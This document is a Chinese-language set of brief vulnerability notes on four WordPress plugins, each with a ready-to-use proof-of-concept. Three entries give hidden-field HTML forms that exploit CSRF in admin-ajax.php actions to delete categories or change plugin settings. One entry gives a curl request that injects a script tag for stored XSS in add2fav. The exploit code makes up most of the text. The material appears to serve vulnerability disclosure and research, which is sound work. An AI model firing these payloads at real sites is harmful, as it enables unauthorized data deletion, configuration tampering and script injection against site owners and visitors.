WordPress YDS Support Ticket System plugin <= 1.0 -CSRF漏洞

由于缺少对权限的控制以及nonce的判断,从而导致CSRF漏洞 POC如下: < html> < body> < form action="http://localhost/new/wp-admin/admin-ajax.php?action=deleteCategory" method="POST" enctype="multipart/form-data"> < input type="hidden" name="catId" value="1"> < input type="submit" name="Submit"> < /form> < /body> < /html> 提交完后从而修改了CATID的值

WordPress add2fav plugin <= 1.0 - XSS漏洞

由于没有过滤一些字符,从而导致可以构造闭合,并造成XSS POC如下: curl ‘http://exsample.com/wp-admin/options-general.php?page=add2fav_uid’ –data ‘add2fav_hidden=Y&add2fav_label_add= %22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript %3E&add2fav_label_rem=Remove+from+Favorites &add2fav_label_reg=&add2fav_label_off=%23&Submit=Save+Changes’

access-code-feeder < 1.0.3 subscriber权限下CSRF导致的插件更新

POC如下: < html> < body> < form action="http://localhost/new/wp-admin/admin-ajax.php?action=base_url_action" method="POST" enctype="multipart/form-data"> < input type="hidden" name="new_url" value="http://www.google.com"> < input type="submit" name="Submit"> < /form> < /body> < /html> 漏洞详情:https://patchstack.com/database/vulnerability/access-code-feeder/wordpress-access-code-feeder-plugin-1-0-3-cross-site-request-forgery-csrf-vulnerability

about-rentals < = 1.5 任意用户未经授权的函数调用导致配置更新

由于没有对AJAX异常函数调用进行NONCE的验证和角色权限的判断,从而导致了任意用户未经授权的函数调用导致配置更新 POC如下: < html> < body> < form action="http://localhost/new/wp-admin/admin-ajax.php?action=abr_update_search_settings" method="POST" enctype="multipart/form-data"> < input type="hidden" name="value" value="200"> < input type="submit" name="Submit"> < /form> < /body> < /html> 从而导致修改了插件的配置